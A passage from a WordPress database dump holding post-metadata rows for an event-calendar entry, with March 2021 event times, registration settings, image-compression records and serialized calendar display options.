EventVenueID\";i:1613555945;s:12:\"_dp_original\";i:1613555945;s:16:\"tribe_events_cat\";i:1613586866;s:10:\"_edit_last\";i:1613556016;s:10:\"post_title\";i:1613561666;s:12:\"post_content\";i:1613556803;s:11:\"post_status\";i:1613556016;}'),(132109,263805,'_EventDuration','4500'),(132081,263805,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1613555945;s:12:\"_EventOrigin\";i:1613555945;s:13:\"_thumbnail_id\";i:1613555945;s:24:\"boldgrid_hide_page_title\";i:1613555945;s:17:\"_EventShowMapLink\";i:1613555945;s:13:\"_EventShowMap\";i:1613555945;s:15:\"_EventStartDate\";i:1613556016;s:13:\"_EventEndDate\";i:1613556016;s:18:\"_EventStartDateUTC\";i:1613556016;s:16:\"_EventEndDateUTC\";i:1613556016;s:14:\"_EventDuration\";i:1613555945;s:20:\"_EventCurrencySymbol\";i:1613555945;s:22:\"_EventCurrencyPosition\";i:1613555945;s:10:\"_EventCost\";i:1613555945;s:9:\"_EventURL\";i:1613555945;s:14:\"_EventTimezone\";i:1613555945;s:18:\"_EventTimezoneAbbr\";i:1613556016;s:27:\"_EventNextPendingRecurrence\";i:1613555945;s:26:\"_RTECregistrationsDisabled\";i:1613555945;s:17:\"_RTECdeadlineType\";i:1613555945;s:19:\"_RTECwhoCanRegister\";i:1613555945;s:23:\"_RTEClimitRegistrations\";i:1613555945;s:21:\"_RTECmaxRegistrations\";i:1613555945;s:16:\"_EventRecurrence\";i:1613555945;s:18:\"_RTECnumRegistered\";i:1613555945;s:13:\"_EventVenueID\";i:1613555945;s:12:\"_dp_original\";i:1613555945;s:16:\"tribe_events_cat\";i:1613586866;s:10:\"_edit_last\";i:1613556016;s:10:\"post_title\";i:1613561666;s:12:\"post_content\";i:1613556803;s:11:\"post_status\";i:1613556016;}'),(132108,263805,'_EventEndDateUTC','2021-03-27 02:15:00'),(132082,263805,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1613555945;s:12:\"_EventOrigin\";i:1613555945;s:13:\"_thumbnail_id\";i:1613555945;s:24:\"boldgrid_hide_page_title\";i:1613555945;s:17:\"_EventShowMapLink\";i:1613555945;s:13:\"_EventShowMap\";i:1613555945;s:15:\"_EventStartDate\";i:1613556016;s:13:\"_EventEndDate\";i:1613556016;s:18:\"_EventStartDateUTC\";i:1613556016;s:16:\"_EventEndDateUTC\";i:1613556016;s:14:\"_EventDuration\";i:1613555945;s:20:\"_EventCurrencySymbol\";i:1613555945;s:22:\"_EventCurrencyPosition\";i:1613555945;s:10:\"_EventCost\";i:1613555945;s:9:\"_EventURL\";i:1613555945;s:14:\"_EventTimezone\";i:1613555945;s:18:\"_EventTimezoneAbbr\";i:1613556016;s:27:\"_EventNextPendingRecurrence\";i:1613555945;s:26:\"_RTECregistrationsDisabled\";i:1613555945;s:17:\"_RTECdeadlineType\";i:1613555945;s:19:\"_RTECwhoCanRegister\";i:1613555945;s:23:\"_RTEClimitRegistrations\";i:1613555945;s:21:\"_RTECmaxRegistrations\";i:1613555945;s:16:\"_EventRecurrence\";i:1613555945;s:18:\"_RTECnumRegistered\";i:1613555945;s:13:\"_EventVenueID\";i:1613555945;s:12:\"_dp_original\";i:1613555945;s:16:\"tribe_events_cat\";i:1613586866;s:10:\"_edit_last\";i:1613556016;s:10:\"post_title\";i:1613561666;s:12:\"post_content\";i:1613556803;s:11:\"post_status\";i:1613556016;}'),(132107,263805,'_EventStartDateUTC','2021-03-27 01:00:00'),(132114,263805,'_EventTimezone','America/Denver'),(132083,263805,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1613555945;s:12:\"_EventOrigin\";i:1613555945;s:13:\"_thumbnail_id\";i:1613555945;s:24:\"boldgrid_hide_page_title\";i:1613555945;s:17:\"_EventShowMapLink\";i:1613555945;s:13:\"_EventShowMap\";i:1613555945;s:15:\"_EventStartDate\";i:1613556016;s:13:\"_EventEndDate\";i:1613556016;s:18:\"_EventStartDateUTC\";i:1613556016;s:16:\"_EventEndDateUTC\";i:1613556016;s:14:\"_EventDuration\";i:1613555945;s:20:\"_EventCurrencySymbol\";i:1613555945;s:22:\"_EventCurrencyPosition\";i:1613555945;s:10:\"_EventCost\";i:1613555945;s:9:\"_EventURL\";i:1613555945;s:14:\"_EventTimezone\";i:1613555945;s:18:\"_EventTimezoneAbbr\";i:1613556016;s:27:\"_EventNextPendingRecurrence\";i:1613555945;s:26:\"_RTECregistrationsDisabled\";i:1613555945;s:17:\"_RTECdeadlineType\";i:1613555945;s:19:\"_RTECwhoCanRegister\";i:1613555945;s:23:\"_RTEClimitRegistrations\";i:1613555945;s:21:\"_RTECmaxRegistrations\";i:1613555945;s:16:\"_EventRecurrence\";i:1613555945;s:18:\"_RTECnumRegistered\";i:1613555945;s:13:\"_EventVenueID\";i:1613555945;s:12:\"_dp_original\";i:1613555945;s:16:\"tribe_events_cat\";i:1613586866;s:10:\"_edit_last\";i:1613556016;s:10:\"post_title\";i:1613561666;s:12:\"post_content\";i:1613556803;s:11:\"post_status\";i:1613556016;}'),(132106,263805,'_EventEndDate','2021-03-26 20:15:00'),(132115,263805,'_EventTimezoneAbbr','MDT'),(132084,263805,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1613555945;s:12:\"_EventOrigin\";i:1613555945;s:13:\"_thumbnail_id\";i:1613555945;s:24:\"boldgrid_hide_page_title\";i:1613555945;s:17:\"_EventShowMapLink\";i:1613555945;s:13:\"_EventShowMap\";i:1613555945;s:15:\"_EventStartDate\";i:1613556016;s:13:\"_EventEndDate\";i:1613556016;s:18:\"_EventStartDateUTC\";i:1613556016;s:16:\"_EventEndDateUTC\";i:1613556016;s:14:\"_EventDuration\";i:1613555945;s:20:\"_EventCurrencySymbol\";i:1613555945;s:22:\"_EventCurrencyPosition\";i:1613555945;s:10:\"_EventCost\";i:1613555945;s:9:\"_EventURL\";i:1613555945;s:14:\"_EventTimezone\";i:1613555945;s:18:\"_EventTimezoneAbbr\";i:1613556016;s:27:\"_EventNextPendingRecurrence\";i:1613555945;s:26:\"_RTECregistrationsDisabled\";i:1613555945;s:17:\"_RTECdeadlineType\";i:1613555945;s:19:\"_RTECwhoCanRegister\";i:1613555945;s:23:\"_RTEClimitRegistrations\";i:1613555945;s:21:\"_RTECmaxRegistrations\";i:1613555945;s:16:\"_EventRecurrence\";i:1613555945;s:18:\"_RTECnumRegistered\";i:1613555945;s:13:\"_EventVenueID\";i:1613555945;s:12:\"_dp_original\";i:1613555945;s:16:\"tribe_events_cat\";i:1613586866;s:10:\"_edit_last\";i:1613556016;s:10:\"post_title\";i:1613561666;s:12:\"post_content\";i:1613556803;s:11:\"post_status\";i:1613556016;}'),(132105,263805,'_EventStartDate','2021-03-26 19:00:00'),(132116,263805,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(132085,263805,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1613555945;s:12:\"_EventOrigin\";i:1613555945;s:13:\"_thumbnail_id\";i:1613555945;s:24:\"boldgrid_hide_page_title\";i:1613555945;s:17:\"_EventShowMapLink\";i:1613555945;s:13:\"_EventShowMap\";i:1613555945;s:15:\"_EventStartDate\";i:1613556016;s:13:\"_EventEndDate\";i:1613556016;s:18:\"_EventStartDateUTC\";i:1613556016;s:16:\"_EventEndDateUTC\";i:1613556016;s:14:\"_EventDuration\";i:1613555945;s:20:\"_EventCurrencySymbol\";i:1613555945;s:22:\"_EventCurrencyPosition\";i:1613555945;s:10:\"_EventCost\";i:1613555945;s:9:\"_EventURL\";i:1613555945;s:14:\"_EventTimezone\";i:1613555945;s:18:\"_EventTimezoneAbbr\";i:1613556016;s:27:\"_EventNextPendingRecurrence\";i:1613555945;s:26:\"_RTECregistrationsDisabled\";i:1613555945;s:17:\"_RTECdeadlineType\";i:1613555945;s:19:\"_RTECwhoCanRegister\";i:1613555945;s:23:\"_RTEClimitRegistrations\";i:1613555945;s:21:\"_RTECmaxRegistrations\";i:1613555945;s:16:\"_EventRecurrence\";i:1613555945;s:18:\"_RTECnumRegistered\";i:1613555945;s:13:\"_EventVenueID\";i:1613555945;s:12:\"_dp_original\";i:1613555945;s:16:\"tribe_events_cat\";i:1613586866;s:10:\"_edit_last\";i:1613556016;s:10:\"post_title\";i:1613561666;s:12:\"post_content\";i:1613556803;s:11:\"post_status\";i:1613556016;}'),(132104,263805,'_EventShowMap',''),(132117,263805,'_RTECregistrationsDisabled','1'),(132086,263805,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1613555945;s:12:\"_EventOrigin\";i:1613555945;s:13:\"_thumbnail_id\";i:1613555945;s:24:\"boldgrid_hide_page_title\";i:1613555945;s:17:\"_EventShowMapLink\";i:1613555945;s:13:\"_EventShowMap\";i:1613555945;s:15:\"_EventStartDate\";i:1613556016;s:13:\"_EventEndDate\";i:1613556016;s:18:\"_EventStartDateUTC\";i:1613556016;s:16:\"_EventEndDateUTC\";i:1613556016;s:14:\"_EventDuration\";i:1613555945;s:20:\"_EventCurrencySymbol\";i:1613555945;s:22:\"_EventCurrencyPosition\";i:1613555945;s:10:\"_EventCost\";i:1613555945;s:9:\"_EventURL\";i:1613555945;s:14:\"_EventTimezone\";i:1613555945;s:18:\"_EventTimezoneAbbr\";i:1613556016;s:27:\"_EventNextPendingRecurrence\";i:1613555945;s:26:\"_RTECregistrationsDisabled\";i:1613555945;s:17:\"_RTECdeadlineType\";i:1613555945;s:19:\"_RTECwhoCanRegister\";i:1613555945;s:23:\"_RTEClimitRegistrations\";i:1613555945;s:21:\"_RTECmaxRegistrations\";i:1613555945;s:16:\"_EventRecurrence\";i:1613555945;s:18:\"_RTECnumRegistered\";i:1613555945;s:13:\"_EventVenueID\";i:1613555945;s:12:\"_dp_original\";i:1613555945;s:16:\"tribe_events_cat\";i:1613586866;s:10:\"_edit_last\";i:1613556016;s:10:\"post_title\";i:1613561666;s:12:\"post_content\";i:1613556803;s:11:\"post_status\";i:1613556016;}'),(132103,263805,'_EventShowMapLink',''),(132118,263805,'_RTECdeadlineType','start'),(132087,263805,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1613555945;s:12:\"_EventOrigin\";i:1613555945;s:13:\"_thumbnail_id\";i:1613555945;s:24:\"boldgrid_hide_page_title\";i:1613555945;s:17:\"_EventShowMapLink\";i:1613555945;s:13:\"_EventShowMap\";i:1613555945;s:15:\"_EventStartDate\";i:1613556016;s:13:\"_EventEndDate\";i:1613556016;s:18:\"_EventStartDateUTC\";i:1613556016;s:16:\"_EventEndDateUTC\";i:1613556016;s:14:\"_EventDuration\";i:1613555945;s:20:\"_EventCurrencySymbol\";i:1613555945;s:22:\"_EventCurrencyPosition\";i:1613555945;s:10:\"_EventCost\";i:1613555945;s:9:\"_EventURL\";i:1613555945;s:14:\"_EventTimezone\";i:1613555945;s:18:\"_EventTimezoneAbbr\";i:1613556016;s:27:\"_EventNextPendingRecurrence\";i:1613555945;s:26:\"_RTECregistrationsDisabled\";i:1613555945;s:17:\"_RTECdeadlineType\";i:1613555945;s:19:\"_RTECwhoCanRegister\";i:1613555945;s:23:\"_RTEClimitRegistrations\";i:1613555945;s:21:\"_RTECmaxRegistrations\";i:1613555945;s:16:\"_EventRecurrence\";i:1613555945;s:18:\"_RTECnumRegistered\";i:1613555945;s:13:\"_EventVenueID\";i:1613555945;s:12:\"_dp_original\";i:1613555945;s:16:\"tribe_events_cat\";i:1613586866;s:10:\"_edit_last\";i:1613556016;s:10:\"post_title\";i:1613561666;s:12:\"post_content\";i:1613556803;s:11:\"post_status\";i:1613556016;}'),(132102,263805,'boldgrid_hide_page_title','0'),(132119,263805,'_RTECwhoCanRegister','any'),(132088,263805,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1613555945;s:12:\"_EventOrigin\";i:1613555945;s:13:\"_thumbnail_id\";i:1613555945;s:24:\"boldgrid_hide_page_title\";i:1613555945;s:17:\"_EventShowMapLink\";i:1613555945;s:13:\"_EventShowMap\";i:1613555945;s:15:\"_EventStartDate\";i:1613556016;s:13:\"_EventEndDate\";i:1613556016;s:18:\"_EventStartDateUTC\";i:1613556016;s:16:\"_EventEndDateUTC\";i:1613556016;s:14:\"_EventDuration\";i:1613555945;s:20:\"_EventCurrencySymbol\";i:1613555945;s:22:\"_EventCurrencyPosition\";i:1613555945;s:10:\"_EventCost\";i:1613555945;s:9:\"_EventURL\";i:1613555945;s:14:\"_EventTimezone\";i:1613555945;s:18:\"_EventTimezoneAbbr\";i:1613556016;s:27:\"_EventNextPendingRecurrence\";i:1613555945;s:26:\"_RTECregistrationsDisabled\";i:1613555945;s:17:\"_RTECdeadlineType\";i:1613555945;s:19:\"_RTECwhoCanRegister\";i:1613555945;s:23:\"_RTEClimitRegistrations\";i:1613555945;s:21:\"_RTECmaxRegistrations\";i:1613555945;s:16:\"_EventRecurrence\";i:1613555945;s:18:\"_RTECnumRegistered\";i:1613555945;s:13:\"_EventVenueID\";i:1613555945;s:12:\"_dp_original\";i:1613555945;s:16:\"tribe_events_cat\";i:1613586866;s:10:\"_edit_last\";i:1613556016;s:10:\"post_title\";i:1613561666;s:12:\"post_content\";i:1613556803;s:11:\"post_status\";i:1613556016;}'),(132090,263805,'_EventOrigin','events-calendar'),(132091,263805,'_EventOrigin','events-calendar'),(132092,263805,'_EventOrigin','events-calendar'),(132093,263805,'_EventOrigin','events-calendar'),(132094,263805,'_EventOrigin','events-calendar'),(132095,263805,'_EventOrigin','events-calendar'),(132096,263805,'_EventOrigin','events-calendar'),(132097,263805,'_EventOrigin','events-calendar'),(132098,263805,'_EventOrigin','events-calendar'),(132099,263805,'_EventOrigin','events-calendar'),(132100,263805,'_EventOrigin','events-calendar'),(132101,263805,'_thumbnail_id','263792'),(132089,263805,'_EventOrigin','events-calendar'),(132120,263805,'_RTEClimitRegistrations','0'),(132121,263805,'_RTECmaxRegistrations','30'),(132122,263805,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(132123,263805,'_RTECnumRegistered','0'),(132124,263805,'_EventVenueID','262435'),(132126,263805,'_dp_original','263791'),(132127,263805,'_edit_lock','1613586982:2'),(132128,263805,'_edit_last','2'),(144984,265294,'smush-info','The file was compressed from 68.10 KB to 63.47 KB saving 6.8 percent using WP-Optimize'),(144983,265294,'smush-complete','1'),(144982,265294,'original-file','2021/08/ESC-OCT-2021-divine-creativity-5-updraft-pre-smush-original.jpg'),(144981,265296,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:51077;s:12:\"smushed-size\";i:48803;s:15:\"savings-percent\";d:4.45000000000000017763568394002504646778106689453125;}'),(144980,265296,'smush-info','The file was compressed from 49.88 KB to 47.66 KB saving 4.45 percent using WP-Optimize'),(144979,265296,'smush-complete','1'),(144978,265296,'original-file','2021/08/ESC-OCT-2021-divine-creativity-6-updraft-pre-smush-original.jpg'),(144977,265296,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:699;s:6:\"height\";i:393;s:4:\"file\";s:44:\"2021/08/ESC-OCT-2021-divine-creativity-6.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-6-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-6-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-6-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-6-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-6-300x393.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:393;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-6-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(144976,265296,'_wp_attached_file','2021/08/ESC-OCT-2021-divine-creativity-6.jpg'),(142410,265023,'skin','monthly_view'),(142411,265023,'sk-options','a:18:{s:4:\"list\";a:30:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:20:\"classic_date_format1\";s:5:\"M d Y\";s:20:\"minimal_date_format1\";s:1:\"d\";s:20:\"minimal_date_format2\";s:1:\"M\";s:20:\"minimal_date_format3\";s:1:\"l\";s:19:\"modern_date_format1\";s:1:\"d\";s:19:\"modern_date_format2\";s:1:\"F\";s:19:\"modern_date_format3\";s:1:\"l\";s:21:\"standard_date_format1\";s:3:\"d M\";s:22:\"accordion_date_format1\";s:1:\"d\";s:22:\"accordion_date_format2\";s:1:\"F\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"month_divider\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"map_on_top\";s:1:\"0\";s:15:\"set_geolocation\";s:1:\"0\";s:21:\"set_geolocation_focus\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:20:\"toggle_month_divider\";s:1:\"0\";}s:4:\"grid\";a:32:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:20:\"classic_date_format1\";s:5:\"d F Y\";s:18:\"clean_date_format1\";s:1:\"d\";s:18:\"clean_date_format2\";s:1:\"F\";s:20:\"minimal_date_format1\";s:1:\"d\";s:20:\"minimal_date_format2\";s:1:\"M\";s:19:\"modern_date_format1\";s:1:\"d\";s:19:\"modern_date_format2\";s:1:\"F\";s:19:\"modern_date_format3\";s:1:\"l\";s:19:\"simple_date_format1\";s:5:\"M d Y\";s:21:\"colorful_date_format1\";s:1:\"d\";s:21:\"colorful_date_format2\";s:1:\"F\";s:21:\"colorful_date_format3\";s:1:\"l\";s:18:\"novel_date_format1\";s:5:\"d F Y\";s:5:\"count\";s:1:\"1\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"map_on_top\";s:1:\"0\";s:15:\"set_geolocation\";s:1:\"0\";s:21:\"set_geolocation_focus\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:6:\"agenda\";a:15:{s:5:\"style\";s:5:\"clean\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:18:\"clean_date_format1\";s:1:\"l\";s:18:\"clean_date_format2\";s:3:\"F j\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"month_divider\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:13:\"full_calendar\";a:25:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:12:\"default_view\";s:4:\"list\";s:13:\"monthly_style\";s:5:\"clean\";s:5:\"limit\";s:0:\"\";s:4:\"list\";s:1:\"1\";s:16:\"date_format_list\";s:3:\"d M\";s:18:\"end_date_type_list\";s:4:\"date\";s:23:\"maximum_date_range_list\";s:0:\"\";s:4:\"grid\";s:1:\"0\";s:18:\"end_date_type_grid\";s:4:\"date\";s:23:\"maximum_date_range_grid\";s:0:\"\";s:4:\"tile\";s:1:\"0\";s:6:\"yearly\";s:1:\"0\";s:20:\"date_format_yearly_1\";s:1:\"l\";s:20:\"date_format_yearly_2\";s:3:\"F j\";s:7:\"monthly\";s:1:\"1\";s:6:\"weekly\";s:1:\"1\";s:5:\"daily\";s:1:\"1\";s:13:\"display_price\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"include_local_time\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:11:\"yearly_view\";a:13:{s:5:\"style\";s:6:\"modern\";s:15:\"start_date_type\";s:18:\"start_current_year\";s:10:\"start_date\";s:0:\"\";s:19:\"modern_date_format1\";s:1:\"l\";s:19:\"modern_date_format2\";s:3:\"F j\";s:5:\"limit\";s:0:\"\";s:6:\"months\";a:12:{i:1;s:1:\"1\";i:2;s:1:\"1\";i:3;s:1:\"1\";i:4;s:1:\"1\";i:5;s:1:\"1\";i:6;s:1:\"1\";i:7;s:1:\"1\";i:8;s:1:\"1\";i:9;s:1:\"1\";i:10;s:1:\"1\";i:11;s:1:\"1\";i:12;s:1:\"1\";}s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:12:\"monthly_view\";a:11:{s:5:\"style\";s:6:\"simple\";s:15:\"start_date_type\";s:19:\"start_current_month\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:19:\"activate_first_date\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:3:\"map\";a:5:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:3:\"200\";s:11:\"geolocation\";s:1:\"0\";s:17:\"geolocation_focus\";s:1:\"0\";}s:10:\"daily_view\";a:11:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:11:\"weekly_view\";a:11:{s:15:\"start_date_type\";s:18:\"start_current_week\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:9:\"timetable\";a:15:{s:5:\"style\";s:6:\"modern\";s:15:\"start_date_type\";s:18:\"start_current_week\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:21:\"number_of_days_modern\";s:1:\"7\";s:14:\"number_of_days\";s:1:\"5\";s:10:\"week_start\";s:2:\"-1\";s:10:\"start_time\";s:1:\"1\";s:8:\"end_time\";s:2:\"13\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:7:\"masonry\";a:18:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:12:\"date_format1\";s:1:\"j\";s:12:\"date_format2\";s:1:\"F\";s:5:\"limit\";s:0:\"\";s:9:\"filter_by\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"fit_to_row\";s:1:\"0\";s:17:\"masonry_like_grid\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:5:\"cover\";a:11:{s:5:\"style\";s:7:\"classic\";s:18:\"date_format_clean1\";s:1:\"d\";s:18:\"date_format_clean2\";s:1:\"M\";s:18:\"date_format_clean3\";s:1:\"Y\";s:20:\"date_format_classic1\";s:3:\"F d\";s:20:\"date_format_classic2\";s:1:\"l\";s:19:\"date_format_modern1\";s:8:\"l, F d Y\";s:8:\"event_id\";s:6:\"264977\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";}s:9:\"countdown\";a:11:{s:5:\"style\";s:6:\"style1\";s:19:\"date_format_style11\";s:5:\"j F Y\";s:19:\"date_format_style21\";s:5:\"j F Y\";s:19:\"date_format_style31\";s:1:\"j\";s:19:\"date_format_style32\";s:1:\"F\";s:19:\"date_format_style33\";s:1:\"Y\";s:8:\"event_id\";s:2:\"-1\";s:8:\"bg_color\";s:7:\"#437df9\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";}s:14:\"available_spot\";a:6:{s:12:\"date_format1\";s:1:\"j\";s:12:\"date_format2\";s:1:\"F\";s:8:\"event_id\";s:2:\"-1\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";}s:8:\"carousel\";a:21:{s:5:\"style\";s:5:\"type1\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:18:\"type1_date_format1\";s:1:\"d\";s:18:\"type1_date_format2\";s:1:\"F\";s:18:\"type1_date_format3\";s:1:\"Y\";s:18:\"type2_date_format1\";s:6:\"M d, Y\";s:18:\"type3_date_format1\";s:6:\"M d, Y\";s:5:\"count\";s:1:\"2\";s:5:\"limit\";s:0:\"\";s:15:\"autoplay_status\";s:1:\"1\";s:8:\"autoplay\";s:0:\"\";s:11:\"loop_status\";s:1:\"1\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:12:\"archive_link\";s:0:\"\";s:9:\"head_text\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";}s:6:\"slider\";a:23:{s:5:\"style\";s:2:\"t1\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:18:\"type1_date_format1\";s:1:\"d\";s:18:\"type1_date_format2\";s:1:\"F\";s:18:\"type1_date_format3\";s:1:\"l\";s:18:\"type2_date_format1\";s:1:\"d\";s:18:\"type2_date_format2\";s:1:\"F\";s:18:\"type2_date_format3\";s:1:\"l\";s:18:\"type3_date_format1\";s:1:\"d\";s:18:\"type3_date_format2\";s:1:\"F\";s:18:\"type3_date_format3\";s:1:\"l\";s:18:\"type4_date_format1\";s:1:\"d\";s:18:\"type4_date_format2\";s:1:\"F\";s:18:\"type4_date_format3\";s:1:\"l\";s:18:\"type5_date_format1\";s:1:\"d\";s:18:\"type5_date_format2\";s:1:\"F\";s:18:\"type5_date_format3\";s:1:\"l\";s:5:\"limit\";s:0:\"\";s:8:\"autoplay\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";}s:8:\"timeline\";a:15:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s